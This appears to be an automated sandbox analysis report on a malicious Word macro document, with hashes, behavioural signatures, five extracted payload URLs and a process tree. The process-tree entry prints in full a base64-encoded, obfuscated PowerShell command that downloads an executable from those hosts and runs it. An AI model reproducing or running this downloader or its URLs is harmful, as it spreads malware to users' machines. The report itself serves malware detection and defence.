Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 05:40
Behavioral task
behavioral1
Sample
fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc
-
Size
70KB
-
MD5
fb9c7a466c950f3c483a9e2d4eb05c55
-
SHA1
1703d2c9619a4abdf81327c5fbf7c61aae404d33
-
SHA256
ddfc1e80e8eb4c0ece096788b0ca80f9e2a2fa55011dd42e2deca7cf9e498c3e
-
SHA512
8421edafe4076beea85089bb60cc0ef79f6b04258cc7c10de0e3769f34684b2be1326f621c90dba32af58f07e64580ee32cf6c1b43f2869be4ee506c3f116be0
-
SSDEEP
768:CsqxsVHHnW/PtcrnMDqkFAGV7yg3yWRrtehxg7sJf1BG3jWRxdCj+3mHWCV:ZqwHHEPGQDpFHV7y0yWRry7RwGCV
Malware Config
Extracted
http://aistra.lt/lTexwuBi/
http://erikploeg.nl/KS/
http://czarny-las.pl/nowa/vUcTmwA/
http://datagroup.com.uy/lLcJnNv/
http://ericalaurell.se/mUeQsM/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2804 620 powershell.exe 29 -
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2804 powershell.exe 8 2804 powershell.exe 10 2804 powershell.exe 12 2804 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 620 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 620 WINWORD.EXE 620 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 620 wrote to memory of 2804 620 WINWORD.EXE 30 PID 620 wrote to memory of 2804 620 WINWORD.EXE 30 PID 620 wrote to memory of 2804 620 WINWORD.EXE 30 PID 620 wrote to memory of 2804 620 WINWORD.EXE 30 PID 620 wrote to memory of 2712 620 WINWORD.EXE 33 PID 620 wrote to memory of 2712 620 WINWORD.EXE 33 PID 620 wrote to memory of 2712 620 WINWORD.EXE 33 PID 620 wrote to memory of 2712 620 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb9c7a466c950f3c483a9e2d4eb05c55_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7AHcAYABTAEMAcgBpAGAAUABUAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwBiAGoAJwAsACcAdAAnACwAJwBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAVwAnACwAJwBTAGMAcgBpAHAAdAAuAFMAaABlACcALAAnAGwAbAAnACkAOwAkAHsAdwBlAGAAQgBjAGwAYABJAGUAYABOAHQAfQAgAD0AIAAmACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdAAnACwAJwBqAGUAYwAnACwAJwBuACcALAAnAGUAdwAtAG8AYgAnACkAIAAoACIAewAwAH0AewAzAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAUwB5AHMAdABlAG0ALgBOAGUAdAAnACwAJwBiAEMAbABpAGUAbgAnACwAJwB0ACcALAAnAC4AVwBlACcAKQA7ACQAewByAEEAbgBgAGQAYABPAE0AfQAgAD0AIAAmACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAZQBjAHQAJwAsACcAbgAnACwAJwBlACcALAAnAHcALQBvAGIAagAnACkAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAnAGEAJwAsACcAbgBkAG8AbQAnACwAJwByACcAKQA7ACQAewBVAGAAUgBsAFMAfQAgAD0AIAAoACIAewAyADMAfQB7ADgAfQB7ADkAfQB7ADEAOQB9AHsAMgA2AH0AewAxADEAfQB7ADIAMAB9AHsANAB9AHsAMAB9AHsAMwB9AHsAMQAwAH0AewAxADgAfQB7ADUAfQB7ADIANAB9AHsAMQA0AH0AewAxADMAfQB7ADIAMQB9AHsAMQB9AHsAMQA2AH0AewAxADcAfQB7ADIANwB9AHsAMgB9AHsAMQAyAH0AewAyADUAfQB7ADIAMgB9AHsANwB9AHsANgB9AHsAMQA1AH0AIgAgAC0AZgAnAC8ASwBTAC8ALABoAHQAdABwADoALwAvAGMAegAnACwAJwBnAHIAbwB1AHAALgBjAG8AbQAuAHUAeQAnACwAJwAvAGUAcgAnACwAJwBhACcALAAnAGgAdAB0AHAAOgAvAC8AZQByAGkAawBwAGwAbwBlAGcALgBuAGwAJwAsACcAcwAuAHAAbAAvAG4AbwB3AGEAJwAsACcAbQBVAGUAJwAsACcAZQBsAGwALgBzAGUALwAnACwAJwAvAGEAaQAnACwAJwBzAHQAcgBhACcALAAnAHIAbgB5ACcALAAnAGkALwAnACwAJwBpAGMAYQBsAGEAJwAsACcAaAB0AHQAcAA6ACcALAAnAFQAbQB3AEEALwAsACcALAAnAFEAcwBNAC8AJwAsACcALwAnACwAJwBsAEwAYwBKAG4ATgAnACwAJwAtAGwAYQAnACwAJwAuAGwAdAAnACwAJwAsACcALAAnAC8ALwBkAGEAdABhACcALAAnAHIAJwAsACcAaAB0AHQAcAA6AC8AJwAsACcALwB2AFUAYwAnACwAJwB1ACcALAAnAC8AbABUAGUAeAB3AHUAQgAnACwAJwB2AC8ALABoAHQAdABwADoALwAnACkALgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAUwBwACcALAAnAGwAaQB0ACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAEEAYABNAEUAfQAgAD0AIAAkAHsAcgBhAGAATgBgAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBwAGEAYABUAEgAfQAgAD0AIAAkAHsAZQBuAHYAOgBgAFQARQBgAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBNAGUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnAC4AJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewB1AGAAUgBsAH0AIABpAG4AIAAkAHsAVQBSAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAYABFAEIAYwBMAEkAZQBgAE4AVAB9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAZQAnACwAJwBpAGwAJwAsACcARABvAHcAbgBsAG8AYQBkAEYAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAdQBgAFIATAB9AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBUACcALAAnAHQAcgBpAG4AZwAnACwAJwBvAFMAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAUABhAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAJwBTAHQAYQByAHQALQBQACcALAAnAHIAbwBjACcALAAnAGUAJwAsACcAcwBzACcAKQAgACQAewBwAGEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAHcAcgBpACcALAAnAGUALQBoAG8AcwB0ACcALAAnAHQAJwApACAAJAB7AF8AfQAuACIAZQBgAHgAQwBlAHAAYABUAEkAbwBOACIALgAiAE0ARQBgAHMAcwBgAEEAZwBlACIAOwB9AH0ADQAKAA==2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2712
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5ab050efca36752c94170edd33083e718
SHA12af053efcebea3dc3b245d9260b5b6206dca2843
SHA2568f754631e0145f7b925a26d3b968bba7284020eec749ffdf5de33a5903c23657
SHA512ce0d15e275ad9f8ab03b4ab3dc6487775c90af3b8bae329ac9d7dbc3e373f385dde1772687686ff4a3a35305a3f28ee779b59a8ed2c262634402151ea19749b4